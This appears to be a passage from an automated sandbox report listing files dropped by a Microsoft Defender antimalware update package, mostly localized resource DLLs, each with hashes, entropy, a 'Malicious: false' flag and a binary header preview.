SHA1:	7DF0CA488B7EC722A1FCF3DB206F47DEF3142AE3
SHA-256:	E0B3B1DE28EA46BDC5938733AC2BFC55A721CD2D409338F48B158567F1DBB4D4
SHA-512:	ADB6288540E9B4BC331CEA357D55FE047DED9B1FB708DEA0D3B864869F5AC0F9F64C4838CA6FF6755AE6BC1BD2EEC1AF9FEFA2E1C8D28DDC85798F0E2C8E87E6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........N...............................................p......f.....@.......................................... ...J...........P...%...........................................................................................rdata..............................@..@.rsrc....J... ...L..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\endpointdlp.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	709896
Entropy (8bit):	6.320985846603814
Encrypted:	false
SSDEEP:	6144:pQ3AdIXCanI0j/gtKOdcN6riykMWE9/cwMVfV8t+4EFfGq/WwkAsojwlk/pk66o5:poSanI0ZcaMWEbMxVb4o/DOoI31NCb
MD5:	74A9AD403A15EB3A6EA6A71D2FF8255E
SHA1:	438F802C056AC693110D594EAE4A2FC3D50C4FA3
SHA-256:	04D4C5CA56CB9E1DBC174B75C3F30103FC35FCFDB476008E19CC3A942499E8DA
SHA-512:	DAA4611FB904B0D262C448059B531C4A1521F051176E8AEC7EBCFE408AA6C1CF03AD71FB29E6E21B3ED2CE2621D98FFBE94D8D4ACCFB2025AA130B134AACDABA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n.b...1...1...1.w.0...1...1...1.w.0...1.w.0...1.w.0p..1.ww1...1.w.0...1.w.0#..1.wu1...1.w.0...1Rich...1................PE..d.....&\|.........." .....@..........................................................=+....`A........................................0...................(....P..DR.......%...... ...0...p.......................(.......@............................................text....;.......@.................. ..`.rdata..@....P.......P..............@..@.data....B.......0..................@....pdata..DR...P...`...0..............@..@.rsrc...(...........................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\es-ES\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	69384
Entropy (8bit):	4.213834865911584
Encrypted:	false
SSDEEP:	1536:NyHGyoFXXAtAW7FDr+FAodTyb2PwHzuAA:UHUFXXAtl5Dr8AodTyb2IH2
MD5:	4CFB5BA88804DF8D66B99CC00CAB49BB
SHA1:	D26F9E455135CC0750AA2D8DB4A729BEA8ED637B
SHA-256:	F694D7E74DB60D4447967630B2B226A9A6242DA140B7A3DB06672827AAFE594C
SHA-512:	DA844FCFC0CC7CBB40FB3E11ECEB9A91703B9851E4732587A352D3AA618C6A515C1783788DE1D6417A29C827AD26CB643795E56ACA1EC8AEC02EA9AE212911A4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................~.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\es-ES\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59656
Entropy (8bit):	4.458154609120415
Encrypted:	false
SSDEEP:	1536:W7H6BJdLd0dZLTOy+JdVfQT/eNNhXP8Vzu1:W7H6BJdLd0dZLTOJ4T/eRXEA
MD5:	45F1098C22976DFC1759E9D2BFEE8F14
SHA1:	7E3484803F3D32853348C581D8C46BC6FA5F6E88
SHA-256:	1CC2743A7F68363DB76D90E56D6CB0A28972CF236E31937FD5F585DD6B48FA7F
SHA-512:	DC3D8C64B3DDBA5594CD6E554D9E1AB123194F852984BB13722C40CDC83474545F9494FB4E004C4D2C372382F81B325A4A28D2EE7E1028E5D4B84B68AD1DB2CE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................?....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\es-ES\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57096
Entropy (8bit):	5.6848617388432405
Encrypted:	false
SSDEEP:	768:YPM1YB2jf14Tx6oe3CEqJWsw/Yg1iBgY1aJ34FYupc1POMufiC9zuum:8M1YB2jfToczsw8wGYup8POVzu9
MD5:	3394AC67CD4392368AB876B702D1587C
SHA1:	232A9A2DDF3C011AE87914D5558328239DE79D46
SHA-256:	6CF4412FA0686ECE5DF89D1DCE9736BBEAAB1789736FAB24CEDEBC6FCE4474D4
SHA-512:	2408FBC0BA936DE16ECFFADA0DCD0E13B8A7DCB9E6DF5CFB99C16027F07AA2ACCADC37B6F79C0D5059B167FF48633FED50BB061A3CFAACB538ECCE19F8F3BC9D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ..4................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\es-ES\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33040
Entropy (8bit):	5.0279269504896655
Encrypted:	false
SSDEEP:	384:SEV153c7y7z7X+QqIOQGuWSa/WMDBRJ3STKAR9zbkTY:REIOxpV1P3S289zZ
MD5:	4B45273806D4F5DA2C2BBF7394036FC6
SHA1:	D2DD2C5BD08111F3C32B5F4A1EA2F046C293CD05
SHA-256:	2A432A0B0ACF9C1DD5FC332D39A6084896389D41FB62BFF9AEFB80E7533285E6
SHA-512:	38475DE6D81A82949A81A64075DC51A346D58F00082606EBEDE713F78E1D5928342692A1BAAB75FBA67B3270EF96D15E4520E57138490A662B301682AB1EF6C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z......................................................}Y....@.......................................... ...W...........\...%...........................................................................................rdata..............................@..@.rsrc....W... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..(R...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\es-MX\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68872
Entropy (8bit):	4.239001216330596
Encrypted:	false
SSDEEP:	768:DSY90VX3iN3vpSnynoFXuAQ8Uzt5VaFUkfJ3vmxZZL1M+rl1PQ0QP9zu7a:5yAUyoFXXAt5k/1vmxr1M+rjPszu7a
MD5:	E1B357D1C7577EAB8F1136BBC4B913F8
SHA1:	FCF932F33BDAAC54B3C13595A7E6807BE2D23E97
SHA-256:	81996BB69006F412FABC8EB7152E020DC2651313831732FD5D83D6B651C848F5
SHA-512:	57C1781FC7E8BF61395CF6CA3448990911700DECF9BF43EB73C09864CFD6B11BB41B6C579ED9B5704687EEAD95E4ED7A8946D5FFCC50F3042B2570FB3BF0C32E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................".....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\es-MX\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33040
Entropy (8bit):	4.985350104854962
Encrypted:	false
SSDEEP:	384:Qwa15UA7y7z7X+3GVOQGuWSa/W8DBRJYTN4tgR9zvnr:F1VOxp51PYTNx9zz
MD5:	83B663EB76802A010F6AB1CF04AF7B7A
SHA1:	2FDFE558864B97D0B1CFE74135DD4F643959823F
SHA-256:	E9CFFF1DE10ED4313ADA60C274D3EEB3AB5792C73AA749056E450DC346DEF08E
SHA-512:	A0CAA13ADB814ECAC06DF041A88D2924D783374780D7FDD36AB58E596164EAA872B3174E2CE5015394A64FC4581657983A6E5D51764CFD8768C3FBCBDDA2362F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z............................................................@.......................................... ...W...........\...%...........................................................................................rdata..............................@..@.rsrc....W... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...R...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\et-EE\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61696
Entropy (8bit):	4.3628164885862155
Encrypted:	false
SSDEEP:	384:937feNOqeYwPyTvYH3ZhKFcnxwOjCIpD/s5CP0vDRJ1Y3NabzczgUpUoUhIy0NRd:N6NOqz43S2DaI5xKoCQ1PkXi9zhN
MD5:	2791B851F151BBD6A92385146F27D08C
SHA1:	8D65AD6B729ED4838231F25980D10368B92C77FA
SHA-256:	745DB28B000F1D7E870BD124224DAD9ADAC0EF832B6753C970BFB3CC0A6A672A
SHA-512:	AACD8D1FE31C18361E63959F8054FA8563FFAEF9B2A20325DE5C92F2E87E911416579B4F40A5BC670175B0F6CE16091B2AAD850025AB0EF365785E57B36C0D74
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ..4................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\et-EE\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	5.056436029790737
Encrypted:	false
SSDEEP:	384:8WZ8Mcb+v7owbUG7m5ORhKPin+vVk8kbCqBsP/WSa/WYDBRJdu2vH3rPR9zus8qE:1njLBsm11PL3l9zuApDy
MD5:	B8CBABDA454239D6725F010D90153228
SHA1:	CD225C38D15F6A5B5CBF9C1E34A9957B687957CD
SHA-256:	D2F00401468FE99D24B6C9D1475514272F2095F1DCDB91330028D108B7EA72D0
SHA-512:	A7502DBE1E631AB629F90C11E950A84A3E84CCD234031ED5D83E65B61FEA04D857C4C2FA648BDA8EF0CE00F3E38ED23C3C32507939424D8114F0B48BFD169421
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T......................................................dt....@.......................................... ...Q...........V...%...........................................................................................rdata..............................@..@.rsrc....Q... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%.. M...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\eu-ES\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32008
Entropy (8bit):	5.03719465264097
Encrypted:	false
SSDEEP:	384:t7rNnmbM1oBRKEAAR7ZKLyMWSa/WmDBRJKGCcM6a1R9zusWJam:tAbdZr1PKBn6K9zuj
MD5:	E55E8E5B0E095C72643CC1482F04D6ED
SHA1:	3706365495743A97FE47DD27F585DECEB1A1ADEA
SHA-256:	5E0D877EF06EE000B87B253D5DAD06A05B633E470440853C3B4623130D2DB154
SHA-512:	F6A631E718072171E8FC0B30DE8F4931242F22BF3043EF35D3CB18B39A1A2311C7731964F5D56703D832CC67DCA8E7107D5C9E85FF3BDA081661F108A1A6145B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V.......................................................M....@.......................................... ...S...........X...%...........................................................................................rdata..............................@..@.rsrc....S... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...N...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fa-IR\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29960
Entropy (8bit):	5.580766047230398
Encrypted:	false
SSDEEP:	384:vXYGIOg9Zud+uROYGK8YGV5wYGa5GcmYGWm58JfFp0Gb0LQorRGcfcoqbpy4mNrH:qvr4cXpwse1PeRmuU9zu9C
MD5:	9AE33C3686C4EDD3346BF3D15C0E8020
SHA1:	D79A1E22B03C54B983C6B0FF77605DA3895221BE
SHA-256:	342208DF02E0194BCA26E2A880157AE03595E4DE62286BDCB1570B1E68802653
SHA-512:	747B20D1DBA8212018C9B8E05FEFF0EAB64D5B33355E73B63C57A94D7D547C52B08CF622F64F49BC4B0D5D03DF47174C1CB4EEC5720605629F53E756CE7F3242
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........N...............................................p......i.....@.......................................... ..xJ...........P...%...........................................................................................rdata..............................@..@.rsrc...xJ... ...L..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...E...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fi-FI\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64776
Entropy (8bit):	4.290672062390936
Encrypted:	false
SSDEEP:	768:0QPIDH1Jg5qxf389pppxo6oyoyoa/DCy79vT6x1Pped9zuzN4+:g7jfh6oyoyo7yB2nP4/zuzNl
MD5:	552DB51538D8EA76575F65B0C3FC5367
SHA1:	4A96AEE399027EA2F41863E521D1094B632D39A5
SHA-256:	45C32A183242122E808E22DB927615452E2CBCB05B1D177D27688BB6256E4D85
SHA-512:	8AFDC5CEC9CDD8138DFCC7AB217D660DC3B573D278D98FC628BF8AEBE7669F9B7A137396E0BF6AE6203382A918C6B179C6E9A34F8A0EC3F0E112B4E8A1DCFD72
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................^....@.......................................... ..X................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fi-FI\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54536
Entropy (8bit):	4.5699313676073645
Encrypted:	false
SSDEEP:	768:Mar1Y/GPl9V9JdhfiDQMlVLzEOq0TU8FQ1Pjv3l9zuAwB:MaraePl9V9JdhfiDXlUUIPjHzuA2
MD5:	699F68FBE2E11694A73EBE701C504FD7
SHA1:	4767C767A5EDFCB65CF5A10E2BB451A04CF1F73A
SHA-256:	5A3F079868A7B54C75E98668DD98534F3A05D13268FB885ACD71BCA459799AFA
SHA-512:	434F91FB74A72DF9F1DB468EB38BBA94458A6496CC6174B8620D459E1402463806F50FF56C864F3EC380BAA9BB1C1B2B1F2BE80A1FFBDB4FC516247B512231B4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................v.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fi-FI\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32512
Entropy (8bit):	5.071970754593649
Encrypted:	false
SSDEEP:	768:9ZwH/cBueGsV/d3vvmiGnALAKn3nUN1PdFXi9z8:wH/cUBsV/dfvF3nU7Pr+z8
MD5:	BDDFCFC1EACB25D931ACB02C7FE65848
SHA1:	CE9F3F2DB04C4981934181B520148D6F529AA4CF
SHA-256:	3634F05E40F489680591F140D9D9D45D1D3A1DCA1CEF829F011F313E2BB14B8D
SHA-512:	1D27BAEA21379EC124328358ABDB3038C8F31141128E58A28BAE0A73C60780536FFA75E53720D42A7711BE7218B467277DB5B313E3793938871A0ED525DED7CD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X......................................................cq....@.......................................... ...T...........Z...%...........................................................................................rdata..............................@..@.rsrc....T... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..0O...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fil-PH\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34576
Entropy (8bit):	4.940626135678542
Encrypted:	false
SSDEEP:	384:8JDVdy/PySnwF1Xusmk4Laz3Por7KK4Nb5M2WSa/WRDBRJFtdWF//dJR9z30jz:0O6S4d4tr7P4N2w1PFtdWF//dj9z+
MD5:	7C5E796FAD51FC6CA68CD537721F1E8B
SHA1:	B61B3730995E40520187BAD49F55432DB02E77B0
SHA-256:	BF1F2580C9D86D19AF5B0F63E24ED735D641B6B2B9A1F7F0879DDAD6CC9E2D8A
SHA-512:	F24B4328097EC5A2D20E2AF138A97492740AEBB1E18F8CE23BD001BB6A63B79D8836FAD04E6EA68089033FF9D135F2F164680D072ED04FE82D472C42E67F0E24
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........`......................................................z.....@.......................................... ...\...........b...%...........................................................................................rdata..............................@..@.rsrc....\... ...^..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...W...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fr-CA\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	72960
Entropy (8bit):	4.219006854254728
Encrypted:	false
SSDEEP:	768:KEFQ1pfypacBHsncy4GMxErz4b78bgptRnDD333dUIN7bZIBIrJHIboJ1PHXi9zJ:KhncyR94b78bknDD333vvP3+zJ
MD5:	909A55AE2526B7BE0A4E82DA37D2FC95
SHA1:	007D236D270AC0319CCD6C2B52C07A625D570BF8
SHA-256:	4618A6D118F3543A07659B2A91062358BCA5D47B832C03765C8016F1CA3BC5AA
SHA-512:	FDDE97B8BB63770035E4CB6435385F4E539D74EE349A2C84999077B655FC5D0BF500A33FF2299981031BE9608B5169BE6E1A9A40FA32462A210A033231530D3A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................... ......q.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fr-CA\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34064
Entropy (8bit):	4.981250908313094
Encrypted:	false
SSDEEP:	384:hUTBmcFbliP+etx+Xtyz3/knMNLxaWSa/W3MDBRJw1TN4tgR9zvvjT:yAcFbliP+etOa3cn0p1Pw1TNx9zHjT
MD5:	0EED8C743228CBA784B7A34843078A4A
SHA1:	1ED315628D18B79078EB2B16BEA7AE66ADFCD85B
SHA-256:	FE54DA93D01C1B87ADA6CBBABE0CDB1A8EB09EA387C706C552048F32A16CF1AC
SHA-512:	E45AF798765876EFC07E4FF7677669A569934FA87E8F99C2790DD8711FBF40210B81FAF3B3B5C80EB07454B1BD6CB0914967DF2CE8B9898422E1CF95CFE5F08F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........^............................................................@.......................................... ..`[...........`...%...........................................................................................rdata..............................@..@.rsrc...`[... ...\..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..xV...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fr-FR\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	72968
Entropy (8bit):	4.219029733785922
Encrypted:	false
SSDEEP:	768:UePVgfXLNsZ2oyzlMu66SaGViV1VFhVGvcSmmm5aIet5pIBI91pIsoz1P29/9zu9:9yRkaGViV1VsvNmmmR5P6zu3N
MD5:	77F1F8BBB4EEA6EDD575BCCC65DA9F2B
SHA1:	DD758C6B820F27A50D81C9306D859DEBCA92D2A3
SHA-256:	75D9F01AF55A134965852F427ECD85E05A98784233266A61F970A21DE0EE8AEA
SHA-512:	777A22719BC3B174A80A60A8DC2937A4FE84E7C413E69BF282550F32D18BA787447D366EF05D0EAAA9EEB27DF7C01E029C47B35A46165E555BFAF05AA39D0664
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................... ......f.....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fr-FR\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	62216
Entropy (8bit):	4.446678510391662
Encrypted:	false
SSDEEP:	768:En/nanln1cQT6dmfIe9W0r1R1PXed9zuzmib:E/nanln1DOdmfIe9pHPO/zuzmib
MD5:	9F1F565B7DDEE9257EBD0B6EB7EBF553
SHA1:	DF338630E421365E76CEB392DD698F70ED0514C9
SHA-256:	6BB7486105D112FACC739E556D402D60972EDD29E32D29413E94DF8B5B27CE91
SHA-512:	6954361A721C5FACACDE042978A3526548D5B3FCAA2CEB0979772E81ABFD206E5788171A81E2F74D4F0E43F5B455D4A3353BADE4EECC74B13F1B9B71B2060D9D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................&=....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\fr-FR\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57608
Entropy (8bit):	5.664199015816108
Encrypted:	false
